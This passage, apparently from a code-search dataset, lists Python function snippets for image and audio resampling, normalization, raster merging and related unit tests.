source_width\n else:\n scale = target_height / source_height\n\n return scale", "def _get_sample_size(self, data):\n if self._samples_per_update:\n return self._samples_per_update\n\n len_data = len(data)\n if len_data <= self._min_sample_size:\n return int(len_data)\n return max(int(self._sampling_ratio * len_data), self._min_sample_size)", "def __init__(self, data, pixscale = 7.77/43):\n self.data = data\n self.pixscale = pixscale", "def upsample_nearest(input, size=None, scale_factor=None):\n return interpolate(input, size, scale_factor, 'nearest')", "def src_simple(input_data, output_data, ratio, converter_type, channels):\n input_frames, _ = _check_data(input_data)\n output_frames, _ = _check_data(output_data)\n data = ffi.new('SRC_DATA*')\n data.input_frames = input_frames\n data.output_frames = output_frames\n data.src_ratio = ratio\n data.data_in = ffi.cast('float*', ffi.from_buffer(input_data))\n data.data_out = ffi.cast('float*', ffi.from_buffer(output_data))\n error = _lib.src_simple(data, converter_type, channels)\n return error, data.input_frames_used, data.output_frames_gen", "def set_resolution(self):\n file_name = os.path.basename(self.in_file)\n if '1KM' in file_name:\n self.resolution = 1000\n else:\n raise ValueError(\n 'Cant read this data, please check its resolution: {}'.format(self.in_file))", "def mold_image(images, config):\n return images.astype(np.float32) - config.MEAN_PIXEL", "def mold_image(images, config):\n return images.astype(np.float32) - config.MEAN_PIXEL", "def __call__(self, src, label):\n\n h, w, _ = src.shape\n # interp = np.random.randint(0, 5)\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n img, flips = timage.random_flip(img, px=0.5)\n img = img.astype(np.float32)\n\n if self.teacher_aug:\n target_image_1 = self.random_color_aug(img)\n else:\n target_image_1 = img\n target_image_2 = self.random_color_aug(img)\n\n # target_image_1 = mx.nd.image.to_tensor(target_image_1)\n target_image_1 = mx.nd.image.to_tensor(target_image_1)\n target_image_1 = mx.nd.image.normalize(target_image_1, mean=self._mean, std=self._std)\n\n target_image_2 = mx.nd.image.to_tensor(target_image_2)\n target_image_2 = mx.nd.image.normalize(target_image_2, mean=self._mean, std=self._std)\n\n return target_image_1, target_image_2", "def prep(self):\n print\n print 'Filtering rawdata to data as masked array...'\n# using 0 as flag\n# self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.rawdata[:self.nints,:, self.chans,:] == 0j)\n# using standard flags\n self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.flags[:self.nints,:, self.chans,:] == 0) # mask of True for flagged data (flags=0 in tpipe, which is flags=False in Miriad and flags=True in MS)\n self.dataph = (self.data.mean(axis=3).mean(axis=1)).real #dataph is summed and detected to form TP beam at phase center, multi-pol\n self.min = self.dataph.min()\n self.max = self.dataph.max()\n print 'Shape of data:'\n print self.data.shape\n print 'Dataph min, max:'\n print self.min, self.max\n\n self.freq = self.freq_orig[self.chans]\n\n self.track0 = self.track(0.)\n self.twidth = 0\n for k in self.track0[1]:\n self.twidth = max(self.twidth, len(n.where(n.array(self.track0[1]) == k)[0]))\n\n print 'Track width in time: %d. Iteration could step by %d/2.' % (self.twidth, self.twidth)", "def _get_normalized_flow_countrywide(x_sample):\n global win; win /= 3\n global nebr; nebr = 7 # nebr /= 3\n global norm_min; norm_min = norm_min * 1. / 3\n global MIN_FLOW_NORM; MIN_FLOW_NORM = MIN_FLOW_NORM * 1. / 3\n global MIN_MOVE_PIXEL; MIN_MOVE_PIXEL /= (6*6)\n \n prev_frame = norm_trans(x_sample[-2])\n next_frame = norm_trans(x_sample[-1])\n kernel_shape = (79, 79) # (477/6, 477/6)\n flow = cv2.calcOpticalFlowFarneback(prev_frame, next_frame, 0.5,3,win, 3, nebr, nebr/4, cv2.OPTFLOW_FARNEBACK_GAUSSIAN)\n \n # flow_norm = numpy.linalg.norm(flow, axis=2) # for numpy version >= 1.8\n flow_norm = np.sum(flow**2, axis=2)**(1./2) # for numpy version < 1.8\n \n kernel = np.ones(kernel_shape, np.float32)\n\n# num_moved_flows = numpy.sum(flow_norm>norm_min)\n num_moved_flows = cv2.filter2D((flow_norm>norm_min).astype('float32'), -1, kernel, borderType=cv2.BORDER_REPLICATE)\n\n# if num_moved_flows > MIN_MOVE_PIXEL:\n# flow_fliter = numpy.zeros(shape=flow.shape);\n# flow_fliter[:,:,0] = flow[:,:,0] * (flow_norm > norm_min)\n# flow_fliter[:,:,1] = flow[:,:,1] * (flow_norm > norm_min)\n# \n# flow_mean = numpy.sum(flow_fliter, axis=(0,1)) / num_moved_flows\n# else:\n# flow_mean = numpy.array([0,0])\n \n flow_filter = flow * (flow_norm > norm_min)[:, :, np.newaxis]\n flow_mean = np.zeros_like(flow)\n flow_mean[:,:,0] = cv2.filter2D(flow_filter[:,:,0], -1, kernel, borderType=cv2.BORDER_REPLICATE) / (num_moved_flows + 0.00001)\n flow_mean[:,:,1] = cv2.filter2D(flow_filter[:,:,1], -1, kernel, borderType=cv2.BORDER_REPLICATE) / (num_moved_flows + 0.00001)\n flow_mean = flow_mean * (num_moved_flows > MIN_MOVE_PIXEL)[:, :, np.newaxis]\n\n# flow_mean_norm = np.sum(flow_mean**2)**(1./2)\n# if flow_mean_norm > MIN_FLOW_NORM:\n# flow_norm = flow_norm.reshape((flow_norm.shape[0], flow_norm.shape[1], 1)) \n# flow = flow * (flow_norm < MIN_FLOW_NORM) * flow_mean_norm / flow_norm + flow * (flow_norm >= MIN_FLOW_NORM)\n flow_mean_norm = np.sum(flow_mean**2, axis=2)**(1./2)\n flow = flow * ((flow_norm < MIN_FLOW_NORM) * (flow_mean_norm > MIN_FLOW_NORM) * flow_mean_norm / (flow_norm + 0.000001))[:, :, np.newaxis] + \\\n flow * ((flow_norm >= MIN_FLOW_NORM) | (flow_mean_norm <= MIN_FLOW_NORM))[:, :, np.newaxis] \n return flow", "def normalize_data_unit_interval(data):\n if data.dtype == 'float32':\n return\n return data.astype('float32') / 255.0", "def test_thresholded_image(self):\n orig_size = self._image.size\n self._api.SetImage(self._image)\n image = self._api.GetThresholdedImage()\n self.assertIsNot(image, None)\n self.assertIsInstance(image, Image.Image)\n self.assertEqual(image.size, orig_size)\n self.assertEqual(self._api.GetThresholdedImageScaleFactor(), 1)", "def normalize_dataset(self):", "def get_url_for_min_resolution(self, min_height, min_width, image):", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 1] * self.scale", "def testSmallSrc(self):\n fromWcs = afwGeom.makeSkyWcs(\n crpix=lsst.geom.Point2D(0, 0),\n crval=lsst.geom.SpherePoint(359, 0, lsst.geom.degrees),\n cdMatrix=afwGeom.makeCdMatrix(scale=1.0e-8*lsst.geom.degrees),\n )\n fromExp = afwImage.ExposureF(afwImage.MaskedImageF(1, 1), fromWcs)\n\n toWcs = afwGeom.makeSkyWcs(\n crpix=lsst.geom.Point2D(0, 0),\n crval=lsst.geom.SpherePoint(358, 0, lsst.geom.degrees),\n cdMatrix=afwGeom.makeCdMatrix(scale=1.1e-8*lsst.geom.degrees),\n )\n toExp = afwImage.ExposureF(afwImage.MaskedImageF(10, 10), toWcs)\n\n warpControl = afwMath.WarpingControl(\"lanczos3\")\n # if a bug described in ticket #2441 is present, this will raise an\n # exception:\n numGoodPix = afwMath.warpExposure(toExp, fromExp, warpControl)\n self.assertEqual(numGoodPix, 0)\n self.assertTrue(np.all(np.isnan(toExp.image.array)))\n self.assertTrue(np.all(np.isinf(toExp.variance.array)))\n noDataBitMask = afwImage.Mask.getPlaneBitMask(\"NO_DATA\")\n self.assertTrue(np.all(toExp.mask.array == noDataBitMask))", "def upsample(x):\n return F.interpolate(x, scale_factor=2, mode=\"nearest\")", "def __reduce__(self):\n return ImageNetDownsample, (self.cutout,)", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def read(self):\n try:\n if self.Data.Sync.IsWritten == 1:\n\n if self._IsPauseOn:\n self.Data.Sync.IsPauseOn = 1\n else:\n self.Data.Sync.IsPauseOn = 0\n\n Width = self.Data.Image.ImageWidth\n Height = self.Data.Image.ImageHeight\n\n # Image = np.fromstring(self.Data.Image.Data, np.uint8, Width * Height * self.TARGET_IMAGE_CHANNELS)\n Image = np.frombuffer(self.Data.Image.Data, np.uint8, Width * Height * self.TARGET_IMAGE_CHANNELS)\n Image = Image.reshape(Height, Width, self.TARGET_IMAGE_CHANNELS)\n\n AspectRatio = Width / Height\n TargetWidth = int(self._TargetResolution[1] * AspectRatio)\n\n if TargetWidth >= self._TargetResolution[0]:\n if Width != TargetWidth or Height != self._TargetResolution[1]:\n Image = cv2.resize(Image, (TargetWidth, self._TargetResolution[1]))\n\n if TargetWidth != self._TargetResolution[0]:\n XStart = int(TargetWidth/2 - self._TargetResolution[0]/2)\n XStop = int(TargetWidth/2 + self._TargetResolution[0]/2)\n Image = Image[:, XStart:XStop]\n\n else:\n TargetHeight = int(self._TargetResolution[0]/AspectRatio)\n\n if Width != self._TargetResolution[0] or Height != TargetHeight:\n Image = cv2.resize(Image, (self._TargetResolution[1], TargetHeight))\n\n if TargetHeight != self._TargetResolution[1]:\n YStart = int(TargetHeight/2 - self._TargetResolution[1]/2)\n YStop = int(TargetHeight/2 + self._TargetResolution[1]/2)\n Image = Image[YStart:YStop, :]\n\n # Shall we convert this to 0 - 1 ?\n self._RawImage = Image\n self._Image = cv2.flip(Image, 0)\n\n # This one does not flip the image, but it rotate and crop !!\n # self._Image = np.array(cv2.flip(Image, 0)/255, dtype=np.float32)\n # self._Image = cv2.flip(Image, 0)\n\n\n # This one is flipped upside/down\n # print(\"Image from memory reshaped as WxH with Mean\", Width, Height, np.mean((self._Image), axis=(0, 1)))\n # self.store_to_file(self._Image)\n\n return True\n except:\n print(\"Unexpected error in Shared Memory Read\", sys.exc_info()[0])\n\n return False", "def preprocess(self, data):\n (w,h,f) = self.rawinputformat()\n dt = numpy.dtype(numpy.uint8)\n nb = numpy.frombuffer(data,dt,-1,0)\n actual_stream_width = (w&1)+w # hack, rather get this from the app sink\n if(actual_stream_width != self.reqsize):\n nb = nb.reshape(h,actual_stream_width,3)\n nb = nb[0:h,0:w,0:3] # crop to network input size\n else:\n nb = nb.reshape((actual_stream_width,actual_stream_width,3))\n img = nb.astype('float32')\n #Preprocess image\n #for i in range(3):\n # img[:,:,i] = (img[:,:,i] - self.mean[i]) * self.std[i]\n #img = resize(img/255.0,(w,h),1)\n img = img/255.0\n print(img.shape)\n #print(img[0,0,:])\n return img.astype(numpy.float16)", "def minimum_sampling(self):\n return self.r_eff/3.", "def prep(self):\n print\n print 'Filtering rawdata to data as masked array...'\n# using 0 as flag\n# self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.rawdata[:self.nints,:, self.chans,:] == 0j)\n# using standard flags\n self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.flags[:self.nints,:, self.chans,:] == 0) # mask of True for flagged data (flags=0 in tpipe, which is flags=False in Miriad and flags=True in MS)\n self.dataph = (self.data.mean(axis=3).mean(axis=1)).real #dataph is summed and detected to form TP beam at phase center, multi-pol\n self.min = self.dataph.min()\n self.max = self.dataph.max()\n print 'Shape of data:'\n print self.data.shape\n print 'Dataph min, max:'\n print self.min, self.max\n\n self.freq = self.freq_orig[self.chans]\n\n # set up ur tracks (lol)\n self.dmtrack0 = {}\n self.twidths = {}\n for dmbin in xrange(len(self.dmarr)):\n self.dmtrack0[dmbin] = self.dmtrack(self.dmarr[dmbin],0) # track crosses high-freq channel in first integration\n self.twidths[dmbin] = 0\n for k in self.dmtrack0[dmbin][1]:\n self.twidths[dmbin] = max(self.twidths[dmbin], len(n.where(n.array(self.dmtrack0[dmbin][1]) == k)[0]))\n\n print 'Track width in time: '\n for dmbin in self.twidths:\n print 'DM=%.1f, twidth=%d. Iteration could step by %d/2.' % (self.dmarr[dmbin], self.twidths[dmbin], self.twidths[dmbin])", "def upsample(X, y, seed):\n ros = RandomOverSampler(random_state=seed)\n X_resampled, y_resampled = ros.fit_resample(X, y)\n return X_resampled, y_resampled", "def near_surface_samples(self):\n if self._near_surface_samples is None:\n if self.is_from_directory:\n nss_sample_path = f'{self._directory_root}/nss_points.sdf'\n nss = gaps_util.read_pts_file(nss_sample_path)\n # log.info(f'The points have shape {nss.shape}')\n else:\n nss = self._archive['axis_samples']\n self._near_surface_samples = np.reshape(nss,\n [100000, 4]).astype(np.float32)\n return self._near_surface_samples", "def preprocess(self, data):\n data_unnorm = data / 2.0 + 0.5\n \n if self.permute == 1:\n permute = [2, 1, 0]\n data_rgb_unnorm = data_unnorm[:, permute]\n elif self.permute == 0:\n data_rgb_unnorm = data_unnorm\n \n data_rgb_unnorm = F.upsample(data_rgb_unnorm, size=self.size, mode='bilinear')\n data_rgb = (data_rgb_unnorm - self.normalize_mean) / self.normalize_std\n return data_rgb", "def regrid_lowmemory(sourceimage,targetimage,fillval = NAN,theader = 0):\n # Start timer\n start = time.time()\n # Load in source data and header information\n sdata,sheader = fits.getdata(sourceimage,header = True)\n # Create WCS object for the source image\n sourcewcs = wcs.WCS(sheader)\n # Create array of pixel indices in source image\n x = arange(sdata.shape[1])\n y = arange(sdata.shape[0])\n # Interpolate the image data over pixel indices\n interp = scipy.interpolate.RectBivariateSpline(y,x,sdata)\n # Load in target grid data\n if theader == 0:\n tdata,theader = fits.getdata(targetimage,header=True)\n if theader != 0:\n tdata = fits.getdata(targetimage)\n # Create WCS object for target grid\n targetwcs = wcs.WCS(theader)\n # Create all possible pairs of pixel coordinates in target grid\n coords = cartesian([arange(tdata.shape[1]),arange(tdata.shape[0])])\n # Extract x and y columns of pixel pairs\n xpixs = coords[:,0]\n ypixs= coords[:,1]\n # Convert target grid pixels to ra/dec \n world = targetwcs.wcs_pix2world(coords,0)\n # Convert target grid ra/dec to source pixel coordinates\n dpix = sourcewcs.wcs_world2pix(world,0)\n # Extract x and y columns of converted pixel pairs\n xdpixs = dpix[:,0]\n ydpixs = dpix[:,1]\n # Find where target grid corresponds to actual source image data\n good = where((xdpixs >= min(x)) & (xdpixs <= max(x)) & (ydpixs >= min(y)) & (ydpixs <= max(y)))\n # Pick out only pixels with relevant image data\n xpixs = xpixs[good]\n ypixs = ypixs[good]\n xdpixs = xdpixs[good]\n ydpixs = ydpixs[good]\n # Create grid to fill up with source image regrid\n tofill = copy(tdata)\n tofill[:] = fillval\n # Loop over relevant pixels and fill up source image regrid\n for i in range(len(ypixs)):\n ypix = ypixs[i]\n xpix = xpixs[i]\n xdpix = xdpixs[i]\n ydpix = ydpixs[i]\n tofill[ypix,xpix] = interp(ydpix,xdpix)\n # End timer\n end = time.time()\n # Print time to run\n print 'Regridded in ',(end-start)/60.,' min'\n return tofill,tdata", "def check_dataset(*, low_path: str, high_path: str, count: int = 1):\n with open(high_path, \"rb\") as s_file:\n src_data: np.array = np.load(s_file)\n\n with open(low_path, \"rb\") as s_file:\n res_data: np.array = np.load(s_file)\n\n assert src_data.shape == res_data.shape\n n, m = res_data.shape\n core_size = int(np.sqrt(m / LAYERS))\n assert core_size ** 2 * LAYERS == m\n k = core_size * 4\n\n for _ in range(count):\n img = np.zeros(\n (core_size, k, LAYERS), dtype=res_data.dtype\n )\n i = random.randint(0, n)\n res_row = res_data[i]\n src_row = src_data[i]\n\n mask = create_percent_diff(src_row, res_row)\n restored_src = apply_diff(res_row, mask)\n for l_i, layer_mask in enumerate(np.reshape(mask, (LAYERS, core_size, core_size))): # noqa\n print(f\"layer {l_i} mask:\")\n for row in layer_mask:\n print(\",\".join(map(\"{: >3}\".format, row)))\n\n nopy_restore_area(\n img[:, 0:core_size, :], src_row, core_size, LAYERS\n )\n nopy_restore_area(\n img[:, core_size:core_size * 2, :], res_row, core_size, LAYERS\n )\n nopy_restore_area(\n img[:, core_size * 2:core_size * 3, :], mask, core_size, LAYERS\n )\n nopy_restore_area(\n img[:, core_size * 3:k, :], restored_src, core_size, LAYERS\n )\n plt.imshow(Image.fromarray(img))\n plt.show(block=True)", "def test_get_image(self):\n\n spine_data_loader = SpineDataLoader(dirpath_data=self.dirpath,\n batch_size=4)\n\n for idx in range(4):\n image = spine_data_loader.get_image(str(idx))\n assert image.shape == (256, 256, 1)\n assert image.min() == 0.0\n assert image.max() == 1.0\n assert image.dtype == 'float64'", "def UResolution(self, *args):\n return _Adaptor3d.Adaptor3d_Surface_UResolution(self, *args)", "def __init__(self, data_source, batch_size):\n self.batch_size = batch_size\n self.samples_per_row = ceil(len(data_source) / batch_size)\n self.num_samples = self.samples_per_row * batch_size", "def adjust_image_data(self):\r\n\r\n print('Adjusting image data: ')\r\n\r\n if self.removeFirstSequence: # used to remove the first trial from the sequence\r\n\r\n frames_per_rep = self.nFrames/self.nrepetitions\r\n\r\n self.imageData = self.imageData[frames_per_rep:, :, :]\r\n\r\n self.nFrames = self.imageData.shape[0]\r\n\r\n self.nrepetitions = int(self.nFrames/(self.period * self.framerate))\r\n\r\n self.times = np.arange(0, self.nFrames/self.framerate, 1.0/self.framerate)\r\n\r\n \r\n\r\n # first squeeze the image to 3d if it is 4d\r\n\r\n maxt = np.max(self.times) # find last image time\r\n\r\n sh = self.imageData.shape\r\n\r\n if len(sh) == 4:\r\n\r\n self.imageData = self.imageData.squeeze()\r\n\r\n sh = self.imageData.shape\r\n\r\n dt = np.mean(np.diff(self.times)) # get the mean dt\r\n\r\n n_Periods = int((maxt+dt)/self.period) # how many full periods in the image set - include the first?\r\n\r\n if self.nrepetitions > 0 and self.nrepetitions < n_Periods:\r\n\r\n n_Periods = self.nrepetitions\r\n\r\n n_PtsPerCycle = int(np.floor(self.period/dt)); # estimate image points in a stimulus cycle\r\n\r\n ndt = self.period/n_PtsPerCycle\r\n\r\n self.imageData = self.imageData[range(0, n_Periods*n_PtsPerCycle),:,:] # reduce to only what we need\r\n\r\n print (' Adjusted image info')\r\n\r\n print (\" # Periods: %d Pts/cycle: %d Cycle dt %8.4fs (%8.3fHz) Cycle: %7.4fs\" %(n_Periods, n_PtsPerCycle, ndt, 1.0/ndt, self.period))\r\n\r\n self.print_image_info()", "def downsample_sam(self, factor):", "def test_oss_fit_sample():\n\n # Resample the data\n oss = OneSidedSelection(random_state=RND_SEED)\n X_resampled, y_resampled = oss.fit_sample(X, Y)\n\n currdir = os.path.dirname(os.path.abspath(__file__))\n X_gt = np.load(os.path.join(currdir, 'data', 'oss_x.npy'))\n y_gt = np.load(os.path.join(currdir, 'data', 'oss_y.npy'))\n assert_array_equal(X_resampled, X_gt)\n assert_array_equal(y_resampled, y_gt)", "def lensedImage(self, source, scale, xl=8., yl=4., gamma=0.):\n image, magMap = lens(self.ltype, self.dist, source, self.x01, self.x02, xl, yl, gamma)\n\n return image, magMap", "def change_resolution(self):", "def getResolution(self):\n return self.resolution", "def resolution(self):\n return next(iter(self.resolutions()), None)", "def __call__(self, src, label, mask):\n # resize shorter side but keep in max_size\n h, _, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n im_scale = float(img.shape[0]) / h\n\n img = vf.to_tensor(img)\n img = vf.normalize(img, mean=self._mean, std=self._std)\n return img, torch.tensor([img.shape[-2], img.shape[-1], im_scale], dtype=torch.float32)", "def _default_sampling_xrange(self):\n from scipy.stats import rv_continuous\n dataset = self.rvdist.rvs(1000) if rv_continuous in self.rvdist.__class__.__mro__ \\\n else self.rvdist.dataset\n scale = np.nanmax(dataset) - np.nanmin(dataset)\n return [np.nanmin(dataset) - scale*0.05, np.nanmax(dataset) + scale*0.05]", "def get_data(name):\n\n if name == 'train' or name == 'unlabeled':\n return np.expand_dims(np.load(os.path.join(DATADIR, 'source_d10_train_X.npy')), axis=-1), \\\n np.argmax(np.load(os.path.join(DATADIR, 'source_d10_train_y.npy')), axis=1)\n # custom svhn has only training/validation set\n elif name == 'validation' or name == 'val':\n return np.expand_dims(np.load(os.path.join(DATADIR, 'source_d10_val_X.npy')), axis=-1), \\\n np.argmax(np.load(os.path.join(DATADIR, 'source_d10_val_y.npy')), axis=1)", "def get_resolution(ds):\n\n if 'x' in ds.coords and 'y' in ds.coords:\n x = ds.coords['x'].values\n y = ds.coords['y'].values\n resx = abs(x[-1] - x[0]) / (len(x) - 1)\n resy = abs(y[-1] - y[0]) / (len(y) - 1)\n return (resx, resy)\n else:\n transform = get_transform(ds)\n if transform is not None:\n return (abs(transform.a), abs(transform.e))\n elif 'res' in ds.attrs:\n return ds.attrs['res']\n\n return None", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 0] * self.scale", "def _compute_raw_image_norm(self):\n return np.sum(self._data, dtype=float)", "def __call__(self, src, label):\n # resize shorter side but keep in max_size\n h, w, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))\n im_scale = h / float(img.shape[0])\n\n img = vf.to_tensor(img)\n img = vf.normalize(img, mean=self._mean, std=self._std)\n return img, bbox.astype('float32'), torch.tensor([im_scale], dtype=torch.float32)", "def resample_img(image, target_shape, mode='nearest'):\n print(target_shape)\n resize_factor = np.array(target_shape)/image.shape\n resampled = scipy.ndimage.interpolation.zoom(image, resize_factor,\n mode=mode)\n return resampled", "def test_copy_sources(self):\n metric_copy = copy_metric(self.metric, self.DATA_MODEL)\n self.assertEqual(\"Source\", first(metric_copy[\"sources\"].values())[\"name\"])", "def _number_of_samples(self):\n return len(self._raw_data.samples)", "def resample(self):\n self.variational_strategy.resample()", "def test_nib_resample_image_3d_to_dest(fake_3dimage_nib, fake_3dimage_nib_big):\n img_r = resampling.resample_nib(fake_3dimage_nib, image_dest=fake_3dimage_nib_big, interpolation='linear')\n assert img_r.get_data().shape == (29, 39, 19)\n assert img_r.get_data()[4, 4, 4] == 1.0", "def quality_data(self, s):\n known_symbols = np.mod(range(176),48)>=32\n print('quality_data',np.sum(np.real(s[known_symbols])<0))\n success = np.sum(np.real(s[known_symbols])<0) < 20\n return success,0 ## no doppler estimate for data frames", "def oversampling(self):\n return self._oversampling", "def get_image(self):\n if self._image is None:\n image_data = np.load(self.image_file)\n if not isinstance(image_data, np.ndarray):\n image_data = image_data['arr_0']\n self.meta_data = ImageWrapper.load_metadata(self.image_file+\".meta\")\n exposure_time = self.meta_data['exposure_time_us'] * 1e-6\n dark_level = float(self.meta_data['black_level'])\n # saturation_mask = image_data.max(axis=2) >= 4094\n image_data = np.clip((image_data.astype(np.float32) - dark_level),\n a_min=0.0, a_max=None) / exposure_time\n if self.original_vignetting is not None:\n image_data = image_data / self.original_vignetting\n if self.crop is not None:\n image_data = image_data[\n self.crop[1,0]:self.crop[1,1],\n self.crop[0,0]:self.crop[0,1]\n ]\n # saturation_mask = saturation_mask[\n # self.crop[1,0]:self.crop[1,1],\n # self.crop[0,0]:self.crop[0,1]\n # ]\n if self.down_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=1./self.down_sample,\n fy=1./self.down_sample,\n interpolation=cv2.INTER_AREA\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=1./self.down_sample,\n # fy=1./self.down_sample,\n # interpolation=cv2.INTER_AREA\n # )\n if self.reup_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=self.reup_sample,\n fy=self.reup_sample,\n interpolation=cv2.INTER_CUBIC\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=self.reup_sample,\n # fy=self.reup_sample,\n # interpolation=cv2.INTER_CUBIC\n # )\n image = torch.tensor(np.transpose(image_data, (2,0,1)), dtype=torch.float32, device=self.device)\n # saturation_mask = torch.tensor(saturation_mask, dtype=torch.float32, device=self.device)\n if not self.lazy:\n self._image = image\n # self._saturation_mask = saturation_mask\n else:\n image = self._image\n # saturation_mask = self._saturation_mask\n\n return image#, saturation_mask", "def merge(sources, bounds=None, res=None, nodata=None, precision=7):\n first = sources[0]\n first_res = first.res\n nodataval = first.nodatavals[0]\n dtype = first.dtypes[0]\n\n # Extent from option or extent of all inputs.\n if bounds:\n dst_w, dst_s, dst_e, dst_n = bounds\n else:\n # scan input files.\n xs = []\n ys = []\n for src in sources:\n left, bottom, right, top = src.bounds\n xs.extend([left, right])\n ys.extend([bottom, top])\n dst_w, dst_s, dst_e, dst_n = min(xs), min(ys), max(xs), max(ys)\n\n logger.debug(\"Output bounds: %r\", (dst_w, dst_s, dst_e, dst_n))\n output_transform = Affine.translation(dst_w, dst_n)\n logger.debug(\"Output transform, before scaling: %r\", output_transform)\n\n # Resolution/pixel size.\n if not res:\n res = first_res\n elif not np.iterable(res):\n res = (res, res)\n elif len(res) == 1:\n res = (res[0], res[0])\n output_transform *= Affine.scale(res[0], -res[1])\n logger.debug(\"Output transform, after scaling: %r\", output_transform)\n\n # Compute output array shape. We guarantee it will cover the output\n # bounds completely.\n output_width = int(math.ceil((dst_e - dst_w) / res[0]))\n output_height = int(math.ceil((dst_n - dst_s) / res[1]))\n\n # Adjust bounds to fit.\n dst_e, dst_s = output_transform * (output_width, output_height)\n logger.debug(\"Output width: %d, height: %d\", output_width, output_height)\n logger.debug(\"Adjusted bounds: %r\", (dst_w, dst_s, dst_e, dst_n))\n\n # create destination array\n dest = np.zeros((first.count, output_height, output_width), dtype=dtype)\n\n if nodata is not None:\n nodataval = nodata\n logger.debug(\"Set nodataval: %r\", nodataval)\n\n if nodataval is not None:\n # Only fill if the nodataval is within dtype's range.\n inrange = False\n if np.dtype(dtype).kind in ('i', 'u'):\n info = np.iinfo(dtype)\n inrange = (info.min <= nodataval <= info.max)\n elif np.dtype(dtype).kind == 'f':\n info = np.finfo(dtype)\n inrange = (info.min <= nodataval <= info.max)\n if inrange:\n dest.fill(nodataval)\n else:\n warnings.warn(\n \"Input file's nodata value, %s, is beyond the valid \"\n \"range of its data type, %s. Consider overriding it \"\n \"using the --nodata option for better results.\" % (\n nodataval, dtype))\n else:\n nodataval = 0\n\n for src in sources:\n # Real World (tm) use of boundless reads.\n # This approach uses the maximum amount of memory to solve the problem.\n # Making it more efficient is a TODO.\n\n # 1. Compute spatial intersection of destination and source.\n src_w, src_s, src_e, src_n = src.bounds\n\n int_w = src_w if src_w > dst_w else dst_w\n int_s = src_s if src_s > dst_s else dst_s\n int_e = src_e if src_e < dst_e else dst_e\n int_n = src_n if src_n < dst_n else dst_n\n\n # 2. Compute the source window.\n src_window = get_window(\n int_w, int_s, int_e, int_n, src.affine, precision=precision)\n logger.debug(\"Src %s window: %r\", src.name, src_window)\n\n # 3. Compute the destination window.\n dst_window = get_window(\n int_w, int_s, int_e, int_n, output_transform, precision=precision)\n logger.debug(\"Dst window: %r\", dst_window)\n\n # 4. Initialize temp array.\n tcount = first.count\n trows, tcols = tuple(b - a for a, b in dst_window)\n\n temp_shape = (tcount, trows, tcols)\n logger.debug(\"Temp shape: %r\", temp_shape)\n\n temp = np.zeros(temp_shape, dtype=dtype)\n temp = src.read(out=temp, window=src_window, boundless=False,\n masked=True)\n\n # 5. Copy elements of temp into dest.\n roff, coff = dst_window[0][0], dst_window[1][0]\n\n region = dest[:, roff:roff + trows, coff:coff + tcols]\n np.copyto(\n region, temp,\n where=np.logical_and(region == nodataval, temp.mask == False))\n\n return dest, output_transform", "def set_data_shape(self):\n # 如果分辨率是 1000 米\n if self.resolution == 1000:\n satellite_type = ['AQUA', 'TERRA']\n if self.satellite in satellite_type:\n try:\n h4File = SD(self.in_file, SDC.READ)\n in_data_r250 = h4File.select('EV_250_Aggr1km_RefSB').get()\n self.data_shape = in_data_r250.shape[1:]\n except Exception as e:\n print(e)\n else:\n raise ValueError(\n 'Cant read this satellite`s data.: {}'.format(self.satellite))\n else:\n raise ValueError(\n \"Cant handle this resolution: \".format(self.resolution))", "def normalize_sample(sample_data):\n BASE = 255\n sample_data = np.array(sample_data, dtype='float32')\n return sample_data/BASE", "def minimum_sampling(self):\n return self.fwhm/2.", "def getDimensions():", "def downsampling(inp_img):\n\n\n img = np.array(inp_img)\n f = max(1, np.rint(np.amin(img)/256))\n\n if f > 1:\n lpf = np.ones((f, f))\n f = (1/(f*f))*lpf\n img = cv2.filter2D(img, -1, kernel=f)\n out = np.hstack((img[:, :, 0], img[:, :, 1], img[:, :, 2]))\n\n return out", "def test_full_resize(self):\n number_of_pixels = 300\n destination = base_path +'/test_data/rendering_tests/resized_images/'\n source_folder = base_path + '/test_data/rendering_tests/filter_database/'\n\n\n for the_file in os.listdir(destination):\n file_path = os.path.join(destination, the_file)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n\n\n self.assertEqual(0, len(os.listdir(destination)))\n rb.find_all_files(number_of_pixels,source_folder, destination)\n self.assertEqual(6, len(os.listdir(destination)))\n for the_file in os.listdir(destination):\n file_path = os.path.join(destination,the_file)\n with Image.open(file_path) as f:\n self.assertNotEqual(number_of_pixels+5, f.size[0])\n self.assertNotEqual(number_of_pixels+5, f.size[1])\n # the above checks that the size does not vary as needed\n # probably not necessary\n self.assertEqual(number_of_pixels, f.size[0])\n self.assertEqual(number_of_pixels, f.size[1])", "def source_freq(self) -> int:", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def test_calc_res():\n with xr.open_rasterio(TEST_RASTER_PATH) as src:\n xr_res = ds.utils.calc_res(src)\n with rasterio.open(TEST_RASTER_PATH) as src:\n rio_res = src.res\n assert np.allclose(xr_res, rio_res)", "def resample(self, data_arr):\n data_arr = np.asarray(data_arr, dtype=np.float32, order='C')\n check_audio(data_arr, is_mono=False)\n\n fn = self._lib['resampleObj_resample']\n fn.argtypes = [POINTER(OpaqueResample),\n np.ctypeslib.ndpointer(dtype=np.float32, ndim=1, flags='C_CONTIGUOUS'),\n c_int,\n np.ctypeslib.ndpointer(dtype=np.float32, ndim=1, flags='C_CONTIGUOUS')]\n data_len = 